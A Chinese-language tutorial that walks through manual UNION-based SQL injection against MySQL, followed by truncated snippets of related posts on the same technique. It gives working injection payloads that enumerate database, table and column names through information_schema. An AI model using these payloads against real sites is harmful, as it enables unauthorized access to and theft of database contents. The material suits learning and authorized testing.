判斷是否存在注入點
判斷是什麼型別注入(字元型or數字型)
判斷閉合方式
查詢列數個數(order by)
5, 獲得資料庫名
獲得表名
獲得欄位名
1. 判斷是否存在注入點 可以用(')單引號顯示資料庫錯誤資訊或者頁面回顯不同
2. 判斷什麼型別(字元型or數字型) 用and 1=1和and 1=2 如果頁面沒有變化說明不是數字型 ,如果有明顯變化說明是數字型
3. 判斷閉合方式 單引號or雙引號..看報錯資訊、
4. 判斷列數個數(order by) order by在mysql中查詢結果是按照指定字段進行排序的,例如資料庫中有3個字段,order by查詢就是1,2,3
5. 檢視資料庫資訊and獲得資料庫名 使用group_concat()
基本語句:
1' union select 1,(select database()),3--+
1' union select 1,(select group_concat(schema_name) from information_schema.schemata) --+
6. 獲得表名
基本語句:
0' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=database()),3 --+
7. 獲得欄位名
基本語句:
0' union select 1,(select group_concat(column_name) from information_schema.columns where table_name='表名'),3 --+
SQL注入(一)之union注入
在sql注入的前期,第一件事情就是找到sql注入點,在找到注入點後開始下面的內容 a.判斷注入點 and1 1 返回true,顯示正常 and1 2 返回false,顯示錯誤 b.猜多少列order by 數值 c.聯合查詢猜表名union select1,2,3,7from users 猜表名並記...
SQL注入中的union注入
環境自己搭的 union聯合,合併,將多條查詢語句結果合併成乙個結果,union注入攻擊是手工測試 1.首先要判斷是否存在注入點 2.通過order by 1 99 查詢字段 首先應該用查詢出欄位 1.注 20表示空格,我這裡從1試到了7 到7的時候報錯,也就會是說有6個字段 2.我的回顯是2和4,...
sql注入 union聯合查詢注入
目錄 一,sql注入必記的一庫三表 二,union聯合查詢注入 1,基本注入流程 1,判斷注入點 2,判斷多少列 3,判斷顯示位 4,顯示資料庫的基本資訊 5,顯示有哪些資料庫 6,顯示資料庫下有哪些表 7,判斷表裡有哪些字段 八,查詢資料表中有哪些資料 information schema 資料庫...